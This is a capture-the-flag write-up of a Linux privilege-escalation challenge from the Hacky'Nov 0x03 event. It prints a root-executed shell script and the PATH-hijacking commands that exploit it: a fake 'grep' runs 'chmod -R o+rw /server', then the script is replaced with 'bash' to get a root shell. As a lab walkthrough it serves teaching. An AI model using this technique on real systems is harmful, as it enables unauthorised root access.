/Cybersecurity/ /Hacky'Nov 0x03/ /PrivEsc/

HN0x03 | Escalade comme un Yamakasi - StupidAdminSys

• HN0x03 | Escalade comme un Yamakasi - StupidAdminSys
  • Goal
  • Walkthrough

HN0x03 | Escalade comme un Yamakasi - StupidAdminSys

This challenge is a part of the Hacky’Nov 0x03 CTF.

Goal

Bypass the shell script to get root access.

Walkthrough

We are given a shell script /server/youarenothing.sh:

#!/bin/bash
IP_USER=$(/bin/ip a | /bin/egrep -o 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}'| /bin/tail -n 1 | /bin/awk '{ print $2 }')

if [ -n $IP_USER ]; then
    /bin/echo "La commande ne contient pas une adresse IP valide."
    exit 1
fi


if [ "$IP_USER" = "127.0.0.1" ]; then
    /bin/echo "Vous utilisez une IP sécurisée."
    /bin/su - secureip
else
    /bin/echo "Si vous n'utilisez pas rapidement une IP sécurisée, je m'en rendrai compte et je supprimerai votre machine."
    exit 1
fi

That we can execute as root through the suid binary /server/executemebecauseyouarenothing.

As for the previous challenge, I obsessed myself with trying to bypass the script instead of trying to find a way to execute commands as root.

I first tried various methods to change the value of IP_USER, but since we cannot edit IP addresses without being root, it was a dead end. I then again (yes, don’t ask me why I do that every time…) tried to bypass the test functions, but of course it also did not work…

Then I remembered that egrep is deprecated and that users should use grep -E instead, I simply read the file and I saw:

#!/bin/sh
cmd=${0##*/}
exec grep -E "$@"

Of course, the hint has been remove, the “real” egrep looks like this (at least on my machine):

#!/bin/sh
cmd=${0##*/}
echo "$cmd: warning: $cmd is obsolescent; using grep -E" >&2
exec grep -E "$@"

Knowing that, we can simply hijack the grep command to execute something else instead (by creating a script named grep and overriding the PATH).

I first tried (yes, I’m really that dumb…) to fake the output so I can bypass the script checks, no success here. Then I found two brain cells and decided to spawn a shell instead:

youhavenorightsbeacauseyousuck@adef92e9a94b:~$ echo "chmod -R o+rw /server" > grep && chmod +x ./grep
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ PATH="$(pwd):$PATH" /server/executemebecauseyouarenothing
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ echo "bash" > /server/youarenothing.sh
youhavenorightsbeacauseyousuck@adef92e9a94b:~$ /server/executemebecauseyouarenothing
root@adef92e9a94b:~# cat /server/flag.txt
HNx03{0lw8s_Use_5tRaCe_T0_check_BINARY}

I asked my friend LOLOLEKIK (who is also the author of this challenge) to explain me the flag because I did not see how strace was related since I solved it without even thinking to the command. He explained to me that he wanted user to use strace and see that the script used grep without absolute path and we could hijack it.

He wrote a blog post called Underlying Execution Hijacking that explain how you can find and exploit scripts and binaries that work like this one.